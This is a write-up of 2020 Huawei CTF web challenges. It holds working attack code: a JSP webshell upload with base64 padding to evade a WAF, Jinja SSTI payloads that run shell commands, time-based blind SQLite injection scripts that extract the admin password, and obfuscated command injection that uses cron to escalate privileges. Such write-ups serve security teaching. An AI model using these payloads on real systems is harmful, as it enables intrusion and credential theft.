
2020HuaweiCTF

webshell_1

用的云waf 很迷,加点混淆字符,传jsp🐎就过了

import requests
import random
import base64
# Shared HTTP session and the challenge instance's base URL used by upload()/cat() below.
req = requests.Session()
url = "http://124.70.221.177:31761/"
def generate_random_str(randomlength=64):
  """Return `randomlength` characters drawn uniformly from the alphanumeric alphabet below.

  Uses `random` rather than `secrets`, so the output is not cryptographically strong; in this
  script it is only filler padding.  The alphabet literal repeats 'G'/'g' and omits 'J'/'j';
  it is reproduced as-is.
  """
  alphabet = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
  last_index = len(alphabet) - 1
  # One randint() draw per character, in order, so a seeded run matches the loop form exactly.
  return ''.join(alphabet[random.randint(0, last_index)] for _ in range(randomlength))
def upload():
    """POST the JSP payload below, padded and base64-encoded, and return the response body.

    The payload is a minimal JSP command shell: when the `pwd` parameter equals "123" it passes
    the `i` parameter to Runtime.exec() and echoes the output inside <pre>.  What the writeup says
    got this past the cloud WAF is the wrapping done here — random alphanumeric prefix/suffix and
    base64 of the whole body — so a signature check on the raw request body never sees the JSP
    tags.  Defensively: inspect the decoded upload, not the transport encoding, and the real fix
    is to never store and serve arbitrary .jsp content from an upload endpoint.

    Returns:
        The response text with newlines removed.  cat() appends it to the base URL, so the
        endpoint is presumed to reply with the stored file's path — not verifiable from this file.
    """
    payload = """<%
if("123".equals(request.getParameter("pwd"))){
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
}
%>"""
    uploadurl = url + "upload.jsp"
    # Random padding on both sides, then base64 the combined text as the raw POST body.
    exp = generate_random_str()+payload+generate_random_str()
    res = req.post(uploadurl,data=str(base64.b64encode(exp.encode('utf-8')),'utf-8'))
    print(str(base64.b64encode(exp.encode('utf-8')),'utf-8'))
    print(res.text.replace("\n",""))
    return res.text.replace("\n","")
def cat():
    """Upload the shell via upload(), then GET base URL + returned text and print the response.

    No `pwd`/`i` parameters are sent here, so this request only confirms the uploaded file is
    being served; the server-side log line for it is a plain GET of the returned path.
    """
    res = req.get(url+upload())
    print(res.text.replace("\n", ""))
if __name__ == '__main__':
    # Loops forever, re-uploading on every iteration (two requests each); stop it manually.
    while True:
        cat()

mine1_1

SSTI

绕就行

/success?msg={{(lipsum|attr(request.values.a)).get(request.values.b).get(request.values.c)(request.values.d).popen(request.values.e).read()}}&a=__globals__&b=__builtins__&c=__import__&d=os&e=cat%20flag.txt&f=123

mine2

再绕,构造

/success?msg={%print(""|attr("\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f")|attr("\x5f\x5f\x62\x61\x73\x65\x73\x5f\x5f")|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")(0)|attr("\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f")()|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")(202)|attr("\x5f\x5f\x69\x6e\x69\x74\x5f\x5f")|attr("\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f")|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")("\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f")|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")("eval")("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x70\x6f\x70\x65\x6e\x28\x27\x6c\x73\x20\x2d\x61\x6c\x6c\x27\x29\x2e\x72\x65\x61\x64\x28\x29"))%}

pyer

SQLite注入

import requests
import string
import time
url = "http://124.70.221.177:31229/login"
req = requests.Session()
# str1 is never used below.  Its `[email protected]` fragment looks like the page extractor's
# email obfuscation mangling the punctuation run (plausibly `?@` originally) — verify against the
# real source before relying on this literal.
str1 = string.ascii_letters+string.digits+string.printable+'!"#$%&\'()*+,-./:;<=>[email protected][\\]^_`{|}~'
# Candidate characters tried at each position by the extraction functions below.
str2 = string.printable
def version():
    """Recover sqlite_version() one character at a time through a time-based blind injection.

    For positions 1..39 and each candidate in str2, the username is built by str.format so the
    injected SQL evaluates `case when substr(...)=candidate then randomblob(50000000) else 0 end`;
    a response slower than 5 s is treated as a match and the candidate is appended.  If no
    candidate matches at a position nothing is recorded and the loop moves on.  Nothing is
    returned; progress is printed.

    The weakness exercised is string-concatenated SQL in the login handler: with a parameterized
    query the `'` in the username would be inert data.  Server-side this looks like a burst of
    login attempts with near-identical payloads and multi-second response times.
    """
    text = ""
    for i in range(1,40):
        for j in str2:
            startTime = time.time()
            req.post(url,data={
                "username":"admin' || 1=(case when(substr(sqlite_version(),{},1)='{}') then randomblob(50000000) else 0 end) || '1".format(i,j),
                "password":"admin"
            })

            # Wall-clock delta includes network latency, so a slow link can produce a false match.
            if time.time() - startTime > 5:
                text += j
                print(text)
                break
#  comment,users
def table():
    """Extract the comma-joined table names from sqlite_master with the same timing oracle as version().

    Positions 1..39 of group_concat(tbl_name) are guessed; a >4 s response marks a match.  Every
    payload is printed before sending, so the console shows each attempt.  Nothing is returned.
    """
    text = ""
    for i in range(1,40):
        for j in str2:
            startTime = time.time()
            payload = "admin' || 1=(case when(substr((SELECT group_concat(tbl_name) FROM sqlite_master WHERE type = 'table'),{},1)='{}') then randomblob(50000000) else 0 end) || '1".format(i,j)
            req.post(url,data={
                "username":payload,
                "password":"admin"
            })
            print(payload)
            if time.time() - startTime > 4:
                text += j
                print(text)
                break
# CREATE TABLE `comment` (
#   `Id` int(11) NOT NULL,
#   `username` varchar(255) DEFAULT NULL,
#   `comment` varchar(255) DEFAULT NULL,
#   PRIMARY KEY (`Id`)
# )
# CREATE TABLE `users` (
#   `Id` int(11) NOT NULL,
#   `username` varchar(255) DEFAULT NULL,
#   `password` varchar(255) DEFAULT NULL,
#   PRIMARY KEY (`Id`)
# )
def sql():
    """Extract the CREATE TABLE statements from sqlite_master, up to 199 characters, via the timing oracle.

    Same loop shape as table(), reading group_concat(sql) instead of tbl_name; the per-attempt
    print is commented out here.  The recovered schema is recorded in the comment block above.
    Nothing is returned.
    """
    text = ""
    for i in range(1,200):
        for j in str2:
            startTime = time.time()
            payload = "admin' || 1=(case when(substr((SELECT group_concat(sql) FROM sqlite_master WHERE type = 'table'),{},1)='{}') then randomblob(50000000) else 0 end) || '1".format(i,j)
            req.post(url,data={
                "username":payload,
                "password":"admin"
            })
            #print(payload)
            if time.time() - startTime > 4:
                text += j
                print(text)
                break
#sqlite_not_safe
def password():
    """Extract the admin row's password column from `users`, up to 199 characters, via the timing oracle.

    Same loop as sql(), targeting group_concat(password) WHERE username='admin'.  The password
    is stored and returned in clear text by the query — a second defect beyond the injection,
    since a hashed column would not yield a reusable credential.  Nothing is returned.
    """
    text = ""
    for i in range(1,200):
        for j in str2:
            startTime = time.time()
            payload = "admin' || 1=(case when(substr((SELECT group_concat(password) FROM users WHERE username='admin'),{},1)='{}') then randomblob(50000000) else 0 end) || '1".format(i,j)
            req.post(url,data={
                "username":payload,
                "password":"admin"
            })
            print(payload)
            if time.time() - startTime > 4:
                text += j
                print(text)
                break
if __name__ == '__main__':
    # Only the final step is run here; version()/table()/sql() were used earlier to map the schema.
    password()

拿到admin/sqlite_not_safe 登录后发现还有注入+模版注入

username=admin'union+select+'{{lipsum.__globals__.__builtins__.__import__("os").popen("cat flag.txt").read()}}'--%20&submit=%E7%99%BB%E9%99%86

hids

命令执行

ls -all / ls$IFS$(printf$IFS"\55\141\154\154")$IFS$(printf$IFS"\57")

cat ../../../../etc/crontab cat$IFS$(printf$IFS"\56\56\57\56\56\57\56\56\57\56\56\57\145\164\143\57\143\162\157\156\164\141\142")

利用crontab提权

echo "import os;os.system('chmod 777 /flag')">/detect.py

echo$IFS$(printf$IFS"\151\155\160\157\162\164\40\157\163\73\157\163\56\163\171\163\164\145\155\50\47\143\150\155\157\144\40\67\67\67\40\57\146\154\141\147\47\51")>$(printf$IFS"\57\144\145\164\145\143\164\56\160\171")

cat /detect.py

cat$IFS$(printf$IFS"\57\144\145\164\145\143\164\56\160\171") cat /flag

cat$IFS$(printf$IFS"\57\146\154\141\147")

cloud

